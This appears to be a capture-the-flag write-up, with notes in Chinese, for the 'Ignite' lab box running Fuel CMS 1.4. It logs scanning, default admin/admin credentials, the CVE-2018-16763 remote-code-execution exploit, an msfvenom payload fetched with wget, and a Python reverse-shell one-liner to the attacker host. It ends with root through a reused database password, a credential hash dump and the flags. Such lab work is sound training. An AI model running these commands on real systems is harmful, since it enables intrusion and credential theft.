Ignite
A new start-up has a few issues with their web server.
Target IP Address : 10.10.98.178
Kali Linux : 10.18.72.222
Task 1: Root it!
Root the box! Designed and created by DarkStar7471, built by Paradox.
Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# nmap 10.10.98.178
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 04:53 EDT
Nmap scan report for 10.10.98.178
Host is up (0.26s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 49.77 seconds
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~]
└─# nmap -sV -p 80 10.10.98.178
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 04:55 EDT
Nmap scan report for 10.10.98.178
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.64 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nmap -sCV -p 80 10.10.98.178
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 04:56 EDT
Nmap scan report for 10.10.98.178
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
http://10.10.98.178/
Welcome to Fuel CMS
Version 1.4
That’s it!
To access the FUEL admin, go to:
http://10.10.98.178/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
访问http://10.10.98.178/fuel,输入用户名admin,密码admin。可以进入后台。
Fuel CMS 1.4.1 - Remote Code Execution (3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit Fuel CMS
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF) | php/webapps/50884.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/Downloads]
└─# searchsploit -m 50477
Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
URL: https://www.exploit-db.com/exploits/50477
Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
Codes: CVE-2018-16763
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Downloads/50477.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(root㉿kali)-[~/Downloads]
└─# python 50477.py -u http://10.10.98.178
[+]Connecting...
Enter Command $whoami
systemwww-data
Enter Command $id
systemuid=33(www-data) gid=33(www-data) groups=33(www-data)
Enter Command $cat /etc/*issue
systemUbuntu 16.04.6 LTS \n \l
Enter Command $uname -a
systemLinux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Enter Command $cat /etc/passwd
systemroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
Enter Command $uname -a
systemLinux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
看不到报错。还是获取一个rever shell。
重置了一下实验室。
Target IP Address : 10.10.142.4
Kali Linux : 10.18.72.222
1
2
3
4
5
6
7
┌──(root㉿kali)-[~/Downloads]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.18.72.222 LPORT=4444 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
1
2
3
┌──(root㉿kali)-[~/Downloads]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
1
2
Enter Command $wget http://10.18.72.222/shell.elf
system
1
2
3
4
5
6
7
8
9
Enter Command $ls -al shell.elf
system-rw-r--r-- 1 www-data www-data 207 Jul 31 06:52 shell.elf
Enter Command $chmod +x shell.elf
system
Enter Command $ls -al shell.elf
system-rwxr-xr-x 1 www-data www-data 207 Jul 31 06:52 shell.elf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[~]
└─# msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
1
Enter Command $./shell.elf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] Sending stage (1017704 bytes) to 10.10.142.4
[*] Meterpreter session 1 opened (10.18.72.222:4444 -> 10.10.142.4:54194) at 2023-07-31 09:58:38 -0400
meterpreter > sysinfo
Computer : 10.10.142.4
OS : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: www-data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
meterpreter > ls
Listing: /var/www/html/fuel/application/config
==============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 452 fil 2019-07-26 15:54:33 -0400 MY_config.php
100777/rwxrwxrwx 4156 fil 2019-07-26 16:02:56 -0400 MY_fuel.php
100777/rwxrwxrwx 1330 fil 2019-07-26 15:54:33 -0400 MY_fuel_layouts.php
100777/rwxrwxrwx 1063 fil 2019-07-26 15:54:33 -0400 MY_fuel_modules.php
100777/rwxrwxrwx 2507 fil 2019-07-26 15:54:33 -0400 asset.php
100777/rwxrwxrwx 3919 fil 2019-07-26 15:54:33 -0400 autoload.php
100777/rwxrwxrwx 18445 fil 2019-07-26 15:54:33 -0400 config.php
100777/rwxrwxrwx 4390 fil 2019-07-26 15:54:33 -0400 constants.php
100777/rwxrwxrwx 506 fil 2019-07-26 15:54:33 -0400 custom_fields.php
100777/rwxrwxrwx 4646 fil 2019-07-26 15:56:06 -0400 database.php
100777/rwxrwxrwx 2441 fil 2019-07-26 15:54:33 -0400 doctypes.php
100777/rwxrwxrwx 4369 fil 2019-07-26 15:54:33 -0400 editors.php
100777/rwxrwxrwx 547 fil 2019-07-26 15:54:33 -0400 environments.php
100777/rwxrwxrwx 2993 fil 2019-07-26 15:54:33 -0400 foreign_chars.php
100777/rwxrwxrwx 421 fil 2019-07-26 15:54:33 -0400 google.php
100777/rwxrwxrwx 890 fil 2019-07-26 15:54:33 -0400 hooks.php
100777/rwxrwxrwx 114 fil 2019-07-26 15:54:33 -0400 index.html
100777/rwxrwxrwx 498 fil 2019-07-26 15:54:33 -0400 memcached.php
100777/rwxrwxrwx 3032 fil 2019-07-26 15:54:33 -0400 migration.php
100777/rwxrwxrwx 10057 fil 2019-07-26 15:54:33 -0400 mimes.php
100777/rwxrwxrwx 706 fil 2019-07-26 15:54:33 -0400 model.php
100777/rwxrwxrwx 564 fil 2019-07-26 15:54:33 -0400 profiler.php
100777/rwxrwxrwx 1951 fil 2019-07-26 15:54:33 -0400 redirects.php
100777/rwxrwxrwx 2269 fil 2019-07-26 15:54:33 -0400 routes.php
100777/rwxrwxrwx 3181 fil 2019-07-26 15:54:33 -0400 smileys.php
100777/rwxrwxrwx 680 fil 2019-07-26 15:54:33 -0400 social.php
100777/rwxrwxrwx 1420 fil 2019-07-26 15:54:33 -0400 states.php
100777/rwxrwxrwx 6132 fil 2019-07-26 15:54:33 -0400 user_agents.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
meterpreter > cat database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['dsn'] The full DSN string describe a connection to the database.
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database driver. e.g.: mysqli.
| Currently supported:
| cubrid, ibase, mssql, mysql, mysqli, oci8,
| odbc, pdo, postgre, sqlite, sqlite3, sqlsrv
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Query Builder class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['encrypt'] Whether or not to use an encrypted connection.
|
| 'mysql' (deprecated), 'sqlsrv' and 'pdo/sqlsrv' drivers accept TRUE/FALSE
| 'mysqli' and 'pdo/mysql' drivers accept an array with the following options:
|
| 'ssl_key' - Path to the private key file
| 'ssl_cert' - Path to the public key certificate file
| 'ssl_ca' - Path to the certificate authority file
| 'ssl_capath' - Path to a directory containing trusted CA certificats in PEM format
| 'ssl_cipher' - List of *allowed* ciphers to be used for the encryption, separated by colons (':')
| 'ssl_verify' - TRUE/FALSE; Whether verify the server certificate or not ('mysqli' only)
|
| ['compress'] Whether or not to use client compression (MySQL only)
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
| ['ssl_options'] Used to set various SSL options that can be used when making SSL connections.
| ['failover'] array - A array with 0 or more data for connections if the main should fail.
| ['save_queries'] TRUE/FALSE - Whether to "save" all executed queries.
| NOTE: Disabling this will also effectively disable both
| $this->db->last_query() and profiling of DB queries.
| When you run a query, with this setting set to TRUE (default),
| CodeIgniter will store the SQL statement for debugging purposes.
| However, this may cause high memory usage, especially if you run
| a lot of SQL queries ... disable this to avoid that problem.
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $query_builder variables lets you determine whether or not to load
| the query builder class.
*/
$active_group = 'default';
$query_builder = TRUE;
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
// used for testing purposes
if (defined('TESTING'))
{
@include(TESTER_PATH.'config/tester_database'.EXT);
}
cheat sheet Basic Linux Privilege Escalation.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@ubuntu:~/html/fuel/application/config$ netstat -antup
netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 608 10.10.142.4:54194 10.18.72.222:4444 ESTABLISHED 1769/shell.elf
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 10.10.142.4:80 10.18.72.222:35398 ESTABLISHED -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:48660 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::50375 :::* -
并不能直接通过meterpreter shell与mysql交互。
1
2
3
4
5
6
7
8
9
10
11
Terminate channel 2? [y/N] y
meterpreter >
Background session 1? [y/N]
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux www-data @ 10.10.142.4 10.18.72.222:4444 -> 10.10.142.4:54194 (10.10.142.4)
也无法直接通过Kali连接目标的mysql,因为目标的mysql只对127.0.0.1开放。
原来不是reverse shell的问题。是50477.py的问题。之前在50477.py中尝试过很多reverse shell都失败了。最后,直接在meterpreter shell中成功执行Python reverse shell。
1
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
1
2
www-data@ubuntu:~/html/fuel/application/config$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
<0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~]
└─# nc -lvp 4433
listening on [any] 4433 ...
10.10.142.4: inverse host lookup failed: Unknown host
connect to [10.18.72.222] from (UNKNOWN) [10.10.142.4] 54976
$ whoami
whoami
www-data
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su root
su root
Password: mememe
root@ubuntu:/var/www/html/fuel/application/config# whoami
whoami
root
root@ubuntu:/var/www/html/fuel/application/config# id
id
uid=0(root) gid=0(root) groups=0(root)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@ubuntu:/var/www/html/fuel/application/config# cd ~
cd ~
root@ubuntu:~# pwd
pwd
/root
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
b9bbcb33e11b80be759c4e844862482d
root@ubuntu:~# cd /home
cd /home
root@ubuntu:/home# ls
ls
www-data
root@ubuntu:/home# cd www-data
cd www-data
root@ubuntu:/home/www-data# ls
ls
flag.txt
root@ubuntu:/home/www-data# cat flag.txt
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@ubuntu:/home/www-data# cd ~
cd ~
root@ubuntu:~# mysql -u root -pmememe
mysql -u root -pmememe
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| fuel_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.33 sec)
mysql> use fuel_schema;
use fuel_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_fuel_schema |
+------------------------+
| fuel_archives |
| fuel_blocks |
| fuel_categories |
| fuel_logs |
| fuel_navigation |
| fuel_navigation_groups |
| fuel_page_variables |
| fuel_pages |
| fuel_permissions |
| fuel_relationships |
| fuel_settings |
| fuel_site_variables |
| fuel_tags |
| fuel_users |
+------------------------+
14 rows in set (0.00 sec)
mysql> select * from fuel_users;
select * from fuel_users;
+----+-----------+------------------------------------------+-------+------------+-----------+----------+-----------+----------------------------------+-------------+--------+
| id | user_name | password | email | first_name | last_name | language | reset_key | salt | super_admin | active |
+----+-----------+------------------------------------------+-------+------------+-----------+----------+-----------+----------------------------------+-------------+--------+
| 1 | admin | f9f6785b4cec20c44c068b6d64e4ca31804dd4e5 | | | | english | | 61219bbacb9dd020254f208c9866b21b | yes | yes |
+----+-----------+------------------------------------------+-------+------------+-----------+----------+-----------+----------------------------------+-------------+--------+
1 row in set (0.00 sec)
User.txt: 6470e394cbf6dab6a91682cc8585059b
Root.txt: b9bbcb33e11b80be759c4e844862482d
